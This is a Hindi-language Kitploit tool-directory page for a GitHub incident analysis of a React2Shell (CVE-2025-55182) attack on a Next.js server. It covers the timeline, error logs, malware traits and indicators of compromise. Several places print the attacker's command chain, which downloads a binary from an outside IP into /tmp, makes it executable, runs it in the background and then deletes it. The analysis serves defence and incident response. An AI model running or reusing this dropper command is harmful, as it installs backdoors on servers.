Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
Log in
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-55182-Attack-Analysis — CVE-2025-55182 (React2Shell) का वास्तविक दुनिया का हमला विश्लेषण - React Server Components RCE भेद्यता | Kitploit
उपकरण/GitHubGitHub/ngvcanh/cve-2025-55182-attack-analysis
समझौता संकेतक (IOC) प्रबंधनभेद्यता विश्लेषणफोरेंसिकवेब सुरक्षामालवेयर विश्लेषणखतरा खुफियालर्निंग और शिक्षाघटना प्रतिक्रिया

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
GitHub
ngvcanh/cve-2025-55182-attack-analysis

CVE-2025-55182-Attack-Analysis

CVE-2025-55182 (React2Shell) का वास्तविक दुनिया का हमला विश्लेषण - React Server Components RCE भेद्यता

रिपॉजिटरी देखें
169 महीने पहलेअभी तक समीक्षित नहीं

CVE-2025-55182 हमला विश्लेषण: React Server Components RCE

प्रोडक्शन Next.js एप्लिकेशन पर वास्तविक दुनिया के हमले का विश्लेषण

📋 विषय-सूची

  • कार्यकारी सारांश
  • भेद्यता अवलोकन
  • हमले की समयरेखा
  • तकनीकी विश्लेषण
  • मैलवेयर विश्लेषण
  • समझौता संकेतक (IOCs)
  • शमन और प्रतिक्रिया
  • सीखे गए सबक
  • संदर्भ

कार्यकारी सारांश

5 दिसंबर, 2025 को, हमारे प्रोडक्शन Next.js एप्लिकेशन को हमलावरों द्वारा निशाना बनाया गया, जिन्होंने CVE-2025-55182 (React2Shell) का शोषण किया, जो React Server Components में एक गंभीर रिमोट कोड निष्पादन (RCE) भेद्यता है। हमले ने हमारे सर्वर पर Linux बैकडोर ट्रोजन डाउनलोड और निष्पादित करने का प्रयास किया।

विशेषतामान
CVE IDCVE-2025-55182
CVSS स्कोर9.8 (गंभीर)
हमले की तारीख5 दिसंबर, 2025
हमले का परिणाम✅ अवरुद्ध (पैच के बाद)
मैलवेयर प्रकारLinux बैकडोर ट्रोजन
प्रभावित स्टैकNext.js + React Server Components

भेद्यता अवलोकन

CVE-2025-55182 क्या है?

CVE-2025-55182, जिसे "React2Shell" के नाम से भी जाना जाता है, एक गंभीर रिमोट कोड निष्पादन (RCE) भेद्यता है जो निम्नलिखित में React Server Components (RSC) को प्रभावित करती है:

  • React: संस्करण 19.0.0 - 19.2.1
  • Next.js: संस्करण 15.x और 16.x (पैच से पहले)

मूल कारण

यह भेद्यता React के Flight Server में renderToReadableStream() फ़ंक्शन में मौजूद है। विशेष रूप से तैयार किए गए RSC पेलोड को संसाधित करते समय, सर्वर कुछ इनपुट को ठीक से सैनिटाइज़ करने में विफल रहता है, जिससे मनमाना कोड निष्पादन होता है।

हमला वेक्टर

Attacker → Malicious RSC Payload → Flight Server → eval() → RCE

हमलावर एक दुर्भावनापूर्ण सीरियलाइज़्ड पेलोड के साथ एक तैयार POST अनुरोध भेजता है, जो सर्वर पर डी-सीरियलाइज़ और निष्पादित हो जाता है।


हमले की समयरेखा

चरण 1: प्रारंभिक शोषण प्रयास (पैच-पूर्व)

टाइमस्टैम्प (UTC)घटना
Dec 5, 06:20पहला हमला Sentry के माध्यम से पता चला
Dec 5, 06:20पेलोड शेल कमांड निष्पादित करने का प्रयास करता है
Dec 5, 06:20हमला आंशिक रूप से सफल (पैच-पूर्व)

Sentry त्रुटि लॉग (पैच-पूर्व):

Error: root
  at eval (eval at <anonymous>, <anonymous>:3:6)
  at nk (chunk.js)
  at JSON.parse (<anonymous>)
  at n5 (/app/node_modules/next/dist/server/app-render.js)

चरण 2: पैच तैनाती

टाइमस्टैम्पकार्रवाई
Dec 4, 14:13Next.js 16.0.7 में अपग्रेड किया गया
Dec 4, 14:13पैच किया गया संस्करण तैनात किया गया (v1.0.0-beta-4)

चरण 3: पैच-पश्चात हमला अवरुद्ध

टाइमस्टैम्प (UTC)घटना
Dec 5, 08:48हमले का प्रयास पता चला
Dec 5, 08:48पेलोड निष्पादन अवरुद्ध
Dec 5, 08:48त्रुटि: syntax error: unexpected ";"

Sentry त्रुटि लॉग (पैच-पश्चात):

Error: Command failed: wget http://45.76.155.14/vim -O /tmp/vim ; 
chmod +x /tmp/vim ; nohup /tmp/vim > /dev/null 2>&1 & ; rm -f /tmp/vim
/bin/sh: syntax error: unexpected ";"

पैच ने दुर्भावनापूर्ण कमांड को निष्पादित होने से सफलतापूर्वक रोक दिया।


तकनीकी विश्लेषण

हमले के अनुरोध का विवरण

विशेषतामान
लक्ष्य URLhttps://[REDACTED]/
विधिPOST
User-AgentPython Requests 2.31
उत्पत्तिस्वचालित हमला स्क्रिप्ट

पेलोड विश्लेषण

हमलावर ने निम्नलिखित कमांड श्रृंखला निष्पादित करने का प्रयास किया:

wget http://45.76.155.14/vim -O /tmp/vim ; \
chmod +x /tmp/vim ; \
nohup /tmp/vim > /dev/null 2>&1 & ; \
rm -f /tmp/vim

विवरण:

चरणकमांडउद्देश्य
1wget http://45.76.155.14/vim -O /tmp/vimमैलवेयर डाउनलोड करें
2chmod +x /tmp/vimनिष्पादन योग्य बनाएं
3nohup /tmp/vim > /dev/null 2>&1 &पृष्ठभूमि में चलाएं, लॉगआउट के बाद बने रहें
4rm -f /tmp/vimसबूत हटाएं

सर्वर वातावरण

घटकसंस्करण
ओएसAlpine Linux 3.23.0
रनटाइमNode.js v20.19.6
फ्रेमवर्कNext.js 16.0.7 (पैच किया गया)
कंटेनरDocker

मैलवेयर विश्लेषण

फ़ाइल जानकारी

विशेषतामान
फ़ाइल का नामvim (वैध टूल के रूप में छिपा हुआ)
SHA2560f0f9c339fcc267ec3d560c7168c56f607232cbeb158cb02a0818720a54e72ce
फ़ाइल प्रकारELF 64-bit LSB executable, x86-64
भाषाGo (संकलित बाइनरी)
फ़ाइल आकार~4.7 MB

VirusTotal परिणाम

पहचान दर: 13/72 (18%)

विक्रेतापहचान नाम
DrWebLinux.BackDoor.Siggen.389
AhnLab-V3Backdoor/Linux.Agent.4780032
KasperskyHEUR:Trojan.Linux.Agent.gen
ESET-NOD32Linux/Agent.PX Trojan
Avast/AVGELF:Agent-BQE [Trj]
AliCloudTrojan:Linux/Agent.ff565f70
Antiy-AVLTrojan/Linux.Agent.px
RisingTrojan.Agent/Linux!8.13268
SentinelOneStatic AI - Suspicious ELF
TencentMalware.Linux.Generic.1c03c8b9
ZillyaTrojan.Agent.Linux.5292

VirusTotal लिंक: विश्लेषण देखें

बाइनरी विश्लेषण

ELF हेडर:

00000000: 7f45 4c46 0201 0100 0000 0000 0000 0000  .ELF............
00000010: 0200 3e00 0100 0000 60e7 4500 0000 0000  ..>.....`.E.....

पहचानी गई क्षमताएँ:

क्षमतासबूत
HTTP/HTTPS क्लाइंटnet/http, *http.Client
TLS एन्क्रिप्शनcrypto/tls, crypto/aes
SOCKS5 प्रॉक्सीsocks, socks5
DNS रिज़ॉल्यूशनnet/dns/dnsmessage
मजबूत क्रिप्टोchacha20poly1305, Ed25519

निकाले गए स्ट्रिंग्स (प्रासंगिक):

crypto/aes
crypto/tls
net/http
socks5
vendor/golang.org/x/crypto/chacha20poly1305
vendor/golang.org/x/net/http2/hpack

ट्रिगर हुए IDS नियम

गंभीरतानियमस्रोत
LOWET POLICY HTTP traffic on port 443 (POST)Proofpoint ET Open
LOWET DNS Query for .cc TLDProofpoint ET Open

मैलवेयर वर्गीकरण

प्रकार: Linux बैकडोर ट्रोजन

क्षमताएँ:

  • रिमोट शेल एक्सेस
  • कमांड एंड कंट्रोल (C2) संचार
  • फ़ाइल अपलोड/डाउनलोड
  • एन्क्रिप्टेड संचार
  • SOCKS5 के माध्यम से ट्रैफ़िक टनलिंग
  • स्थायित्व तंत्र

समझौता संकेतक (IOCs)

नेटवर्क IOCs

प्रकारमानविवरण
IP पता45.76.155.14मैलवेयर वितरण सर्वर
URLhttp://45.76.155.14/vimमैलवेयर डाउनलोड URL
होस्टिंगVultr VPSक्लाउड प्रदाता
TLD.ccC2 डोमेन .cc TLD का उपयोग करता है

फ़ाइल IOCs

प्रकारमान
SHA2560f0f9c339fcc267ec3d560c7168c56f607232cbeb158cb02a0818720a54e72ce
SHA1[यदि आवश्यक हो तो गणना करें]
MD5[यदि आवश्यक हो तो गणना करें]
फ़ाइल का नामvim (छिपा हुआ)
फ़ाइल प्रकारELF 64-bit x86-64
फ़ाइल आकार~4.7 MB

व्यवहारिक IOCs

संकेतकविवरण
wget to external IPगैर-मानक URL से डाउनलोड करता है
Files in /tmp/अस्थायी निर्देशिका में संदिग्ध निष्पादन योग्य फ़ाइल
nohup + background executionस्थायित्व प्रयास
Immediate file deletionसबूत सफाई
Python Requests User-Agentस्वचालित हमला उपकरण

YARA नियम

टूल डाउनलोड करें